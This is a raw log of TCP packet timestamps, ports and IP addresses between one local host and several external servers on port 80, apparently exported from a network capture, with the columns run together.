                                                                                                        Oct 3, 2023 18:02:46.829185963 CEST8049841172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:46.829199076 CEST8049841172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:46.829401970 CEST4984180192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:46.830236912 CEST4984180192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:46.912317038 CEST4984380192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:46.937623024 CEST4984480192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:46.949695110 CEST4984580192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:47.031996965 CEST8049844104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.032856941 CEST4984480192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:47.032856941 CEST4984480192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:47.032856941 CEST4984480192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:47.044342041 CEST8049845104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.044415951 CEST4984580192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:47.044584036 CEST4984580192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:47.044955969 CEST4984580192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:47.076217890 CEST8049838211.104.254.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.127226114 CEST8049844104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.127474070 CEST8049844104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.138940096 CEST8049845104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.139409065 CEST8049845104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.212690115 CEST8049843211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.212806940 CEST4984380192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:47.213037014 CEST4984380192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:47.213067055 CEST4984380192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:47.371155977 CEST8049844104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.371187925 CEST8049844104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.371283054 CEST4984480192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:47.374598026 CEST4984480192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:47.497298002 CEST4984680192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:47.513210058 CEST8049843211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.530338049 CEST8049845104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.530353069 CEST8049845104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.530572891 CEST4984580192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:47.532191038 CEST4984580192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:47.591960907 CEST8049846172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.592067957 CEST4984680192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:47.592349052 CEST4984680192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:47.593101978 CEST4984680192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:47.649121046 CEST4984880192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:47.686916113 CEST8049846172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.687628984 CEST8049846172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.743531942 CEST8049848172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.743736982 CEST4984880192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:47.750857115 CEST4984880192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:47.751430035 CEST4984880192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:47.845304966 CEST8049848172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.845844030 CEST8049848172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.997101068 CEST8049846172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.997157097 CEST8049846172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.997216940 CEST4984680192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:47.999032021 CEST4984680192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:48.100852013 CEST8049848172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:48.100871086 CEST8049848172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:48.100992918 CEST4984880192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:48.109915018 CEST4984880192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:48.128878117 CEST4984980192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:48.223644018 CEST8049849172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:48.223762989 CEST4984980192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:48.223977089 CEST4984980192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:48.224709034 CEST4984980192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:48.233338118 CEST4985080192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:48.318630934 CEST8049849172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:48.319309950 CEST8049849172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:48.327647924 CEST8049850172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:48.327719927 CEST4985080192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:48.328033924 CEST4985080192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:48.328726053 CEST4985080192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:48.331516981 CEST8049843211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:48.331557035 CEST8049843211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:48.331600904 CEST4984380192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:48.331644058 CEST4984380192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:48.422311068 CEST8049850172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:48.422940016 CEST8049850172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:48.454231977 CEST4985280192.168.2.3211.104.254.139
                                                                                                        Oct 3, 2023 18:02:48.569174051 CEST8049849172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:48.569190979 CEST8049849172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:48.569313049 CEST4984980192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:48.571115017 CEST4984980192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:48.631866932 CEST8049843211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:48.695854902 CEST4985380192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:48.735672951 CEST8049852211.104.254.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:48.735940933 CEST4985280192.168.2.3211.104.254.139
                                                                                                        Oct 3, 2023 18:02:48.736371994 CEST4985280192.168.2.3211.104.254.139
                                                                                                        Oct 3, 2023 18:02:48.736417055 CEST4985280192.168.2.3211.104.254.139
                                                                                                        Oct 3, 2023 18:02:48.790462017 CEST8049853104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:48.790627003 CEST4985380192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:48.790836096 CEST4985380192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:48.791599989 CEST4985380192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:48.885312080 CEST8049853104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:48.885895967 CEST8049853104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:49.018239021 CEST8049852211.104.254.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:49.671389103 CEST8049850172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:49.671410084 CEST8049850172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:49.671577930 CEST4985080192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:49.672775984 CEST4985080192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:49.798738956 CEST4985480192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:49.860340118 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:49.860420942 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:49.860481977 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:49.893323898 CEST8049854104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:49.893414974 CEST4985480192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:49.893605947 CEST4985480192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:49.894016981 CEST4985480192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:49.988184929 CEST8049854104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:49.988379955 CEST8049854104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.028029919 CEST8049852211.104.254.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.028125048 CEST8049852211.104.254.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.028171062 CEST4985280192.168.2.3211.104.254.139
                                                                                                        Oct 3, 2023 18:02:50.028225899 CEST4985280192.168.2.3211.104.254.139
                                                                                                        Oct 3, 2023 18:02:50.029429913 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.192933083 CEST8049853104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.192951918 CEST8049853104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.193017006 CEST4985380192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:50.194204092 CEST4985380192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:50.252624989 CEST8049854104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.252641916 CEST8049854104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.252774000 CEST4985480192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.253839970 CEST4985480192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.309341908 CEST8049852211.104.254.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.315212965 CEST4985580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:50.409723043 CEST8049855172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.409919024 CEST4985580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:50.410018921 CEST4985580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:50.410423994 CEST4985580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:50.504390001 CEST8049855172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.504731894 CEST8049855172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.539741039 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.634485006 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.634583950 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.634804010 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.635291100 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.729336023 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.729397058 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.729854107 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.729904890 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.729923010 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.729944944 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.729983091 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.730006933 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.730026960 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.730074883 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.730146885 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.730205059 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.730205059 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.730269909 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.730328083 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.730375051 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.730402946 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.730446100 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.730524063 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.730570078 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.735996962 CEST8049855172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.736030102 CEST8049855172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.736193895 CEST4985580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:50.737236977 CEST4985580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:50.824650049 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.824662924 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.824671030 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.824680090 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.824688911 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.824697018 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.824799061 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.824817896 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.824817896 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.824863911 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.824930906 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.824989080 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.825138092 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.825201035 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.825380087 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.825429916 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.825593948 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.825643063 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.825776100 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.825839996 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.860579967 CEST4985780192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:50.921287060 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.921299934 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.921304941 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.921313047 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.921318054 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.921391010 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:50.921649933 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.921659946 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.921664000 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.921672106 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.921677113 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.921711922 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.921720982 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.921796083 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.921868086 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.921941042 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.921988010 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.922039032 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.922143936 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.922173023 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.922230959 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.922296047 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.922355890 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.922400951 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.922462940 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.922532082 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.922591925 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.954905987 CEST8049857172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.954978943 CEST4985780192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:50.955174923 CEST4985780192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:50.955653906 CEST4985780192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:51.016232014 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:51.016246080 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:51.049628019 CEST8049857172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:51.050493002 CEST8049857172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:51.281804085 CEST8049857172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:51.281821966 CEST8049857172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:51.281873941 CEST4985780192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:51.283030987 CEST4985780192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:51.407912970 CEST4985880192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:51.436037064 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:51.436049938 CEST8049856104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:51.436129093 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:51.437093019 CEST4985680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:51.503067970 CEST8049858104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:51.503308058 CEST4985880192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:51.503391981 CEST4985880192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:51.503864050 CEST4985880192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:51.557296991 CEST4985980192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:51.598046064 CEST8049858104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:51.598157883 CEST8049858104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:51.651978016 CEST8049859104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:51.652076960 CEST4985980192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:51.652271986 CEST4985980192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:51.652671099 CEST4985980192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:51.747004986 CEST8049859104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:51.747153044 CEST8049859104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:51.834650040 CEST8049858104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:51.834669113 CEST8049858104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:51.834875107 CEST4985880192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:51.835908890 CEST4985880192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:51.965364933 CEST4986080192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:52.014172077 CEST8049859104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:52.014189959 CEST8049859104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:52.014313936 CEST4985980192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:52.015258074 CEST4985980192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:52.060122013 CEST8049860104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:52.060254097 CEST4986080192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:52.060496092 CEST4986080192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:52.061012030 CEST4986080192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:52.142061949 CEST4986180192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:52.154974937 CEST8049860104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:52.155425072 CEST8049860104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:52.236846924 CEST8049861172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:52.237087011 CEST4986180192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:52.237179995 CEST4986180192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:52.237593889 CEST4986180192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:52.331763983 CEST8049861172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:52.331907988 CEST8049861172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:52.386337996 CEST8049860104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:52.386370897 CEST8049860104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:52.386550903 CEST4986080192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:52.387881041 CEST4986080192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:52.497072935 CEST4986280192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:52.581671953 CEST8049861172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:52.581706047 CEST8049861172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:52.581826925 CEST4986180192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:52.582928896 CEST4986180192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:52.591696024 CEST8049862172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:52.591809034 CEST4986280192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:52.592021942 CEST4986280192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:52.592488050 CEST4986280192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:52.687314987 CEST8049862172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:52.687344074 CEST8049862172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:52.943912983 CEST8049862172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:52.943928957 CEST8049862172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:52.944027901 CEST4986280192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:52.945796967 CEST4986280192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:53.061224937 CEST4986380192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:53.156053066 CEST8049863172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:53.156383991 CEST4986380192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:53.156429052 CEST4986380192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:53.156955957 CEST4986380192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:53.251322985 CEST8049863172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:53.251532078 CEST8049863172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:53.476747036 CEST8049863172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:53.476768970 CEST8049863172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:53.476869106 CEST4986380192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:53.478702068 CEST4986380192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:53.843441010 CEST4986480192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:53.923526049 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:53.938083887 CEST8049864104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:53.938191891 CEST4986480192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:53.938460112 CEST4986480192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:53.939122915 CEST4986480192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:54.018306971 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.018450022 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.018714905 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.019516945 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.032860041 CEST8049864104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.033611059 CEST8049864104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.113606930 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.113799095 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.114036083 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.114105940 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.114130020 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.114181995 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.114183903 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.114247084 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.114263058 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.114314079 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.114607096 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.114666939 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.114679098 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.114732027 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.114733934 CEST8049865172.67.151.219192.168.2.3
